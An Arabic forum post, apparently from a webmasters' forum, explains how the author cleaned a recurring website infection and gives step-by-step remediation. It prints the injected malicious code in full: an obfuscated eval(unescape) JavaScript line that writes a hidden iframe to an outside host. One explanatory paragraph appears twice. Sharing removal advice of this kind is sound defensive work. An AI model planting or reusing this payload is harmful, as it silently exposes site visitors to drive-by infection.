الموضوع حصري لمنتديات لعيونها جيت
بسم الله الرحمن الرحيم الحمدلله والصلاة والسلام على رسول الله وعلى آله وصحبه أجمعين
يسرني أن اطرح لكم هذا الموضوع الحصري والذي يهم بدرجة كبيرة اصحاب المواقع
فقد تمكنت ولله الحمد من ايجاد الحل الأمثل للتخلص من فايروس المواقع والذي انتشر في الاونة الآخيرة بشكل فضيع
في المواقع والموقع المصاب تتم معرفته من محركات البحث والتي تضع جملة قد يضر هذا الموقع بجهازك ..
كان في السابق عبارة عن جافا سكربت خبيثة غالباً يصيب الملفات بأي امتداد
"main,index,default,login,header,footer"
وذلك بزراعة الكود الخبيث التالي :
رمز PHP:
eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%36%39%61%30%36%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%39%37%37%33%39%38%35%33%30%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%39%31%31%33%36%29%2b%27%34%39%31%5c%27%20%77%69%64%74%68%3d%33%35%36%20%68%65%69%67%68%74%3d%32%35%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));
الكثير من المواضيع التي كتبت وشرح فيها استخدام برامج للخلاص من هذا الفايروس مثل برنامج AVIRA وكذلك برنامج Ravolxz والكثير من البرامج والحلول التي لم تكن مجدية ابداً في الخلاص النهائي منه فلم اترك شيئاً لم اجربه .. وهذه بعض من تلك الحلول التي وجدتها بالانترنت ولم تجدي ابداً:
*- احذف كافة حسابات الاف تي التي تقوم بحفظها في برنامج الاف تي بي الذي تستخدمه على جهازك ولا تقم بحفظ اي بيانات موقع في البرنامج
*- عدل كلمات المرور للوحة التحكم وحسابات الاف تي بي
*- بحظر الاي بي وذلك يتم بالرجوع اولا الى لوق السيرفر ومعرفة اي بي عدونا اللدود
*- احذف برنامج FTP
*- تدخل السبانل وتعدل جميع الملفات التي تحمل اسم index.html / index.php / index.htm
[align=justify]############################
[/align]
[/align]
ولكن للاسف لم تكن ذات فعالية
خصوصاً بعد تطور هذا الفايروس والذي يقوم بإنشاء ملف مشفر باسم image.php ويزرعه في كافة مجلدات الصور images
وعليك ان تدرك ان الاصابة مكمنها جهازك ولا غير
كيف يعمل ؟
اكتشفت وبمحض الصدف انه يعمل من خلال جهاز الحاسب عندما اكون متصلاً بالانترنت فكل ماقمت بتنظيف الملفات من هذا الكود يعود من جديد فهو يقوم بعد فترة زمنية محددة له كمهمة بالاتصال الى جهاز الحاسب من خلال منافذ الاتصال التي تكون مفتوحة في الجهاز فيتصل الى الجهاز اما باسم المستخدم HelpAssistant
او بغيره على ان يكون من مجموعة لها صلاحيات الكتابة والتعديل في الجهاز
ومن هناك يقوم بتنفيذ اوامره بالاتصال بموقعك عبر FTP سواء كان البرنامج مفتوحاً او غير مفتوح ..
#################
الحـــــــــــــــــــــــــــــــــــــــــــــــ ــــــــــل :خصوصاً بعد تطور هذا الفايروس والذي يقوم بإنشاء ملف مشفر باسم image.php ويزرعه في كافة مجلدات الصور images
وعليك ان تدرك ان الاصابة مكمنها جهازك ولا غير
كيف يعمل ؟
اكتشفت وبمحض الصدف انه يعمل من خلال جهاز الحاسب عندما اكون متصلاً بالانترنت فكل ماقمت بتنظيف الملفات من هذا الكود يعود من جديد فهو يقوم بعد فترة زمنية محددة له كمهمة بالاتصال الى جهاز الحاسب من خلال منافذ الاتصال التي تكون مفتوحة في الجهاز فيتصل الى الجهاز اما باسم المستخدم HelpAssistant
او بغيره على ان يكون من مجموعة لها صلاحيات الكتابة والتعديل في الجهاز
ومن هناك يقوم بتنفيذ اوامره بالاتصال بموقعك عبر FTP سواء كان البرنامج مفتوحاً او غير مفتوح ..
#################
#################
الحل الذي قمت بعمله هو التالي :
1- فوراً قمت بتنظيف الملفات المصابة بإزالة الكود منها .
وتذكر جيداً بأنه أصاب كل ملفات الجافا ذات الامتداد .js
كما قمت بحذف ملف image.php وتجده بكل مجلدات الصور images سواء استايلات المنتدى او غيرها اي مجلد (images) تجده يحتوي على ملف image.php وهو مشفر ان استعرضته
2- بعد ان تتأكد 100 بـ 100 من حذف كل شئ يتعلق بهذا الفايروس من الملفات ومجلدات الصور .
3- قم بعمل فورمات لجهازك
4- بعد عمل الفورمات وقبل البدء بتركيب برامجك عليك القيام بالخطوة التالية :
ابدأ ثم لوحة التحكم ثم أدوات ادارية ثم إدارة الكمبيوتر ثم المستخدمين
وحظر (تعطيل) اي مستخدم لا تستخدمه او لم تنشئه انت بعد الفرومات شاهد الصورة
بعد ذلك قم بتحميل برنامج الحماية واي برامج تهمك مع ملاحظة انه يستحسن تغيير برنامج الـ FTP الذي كنت تستخدمه سابقاً .
وبذلك ان شاء الله سيكون اخر عهدك بهذا الفايروس كما كان اخر عهدي به بعد توفيق الله تعالى
مع خالص تحياتي SOKO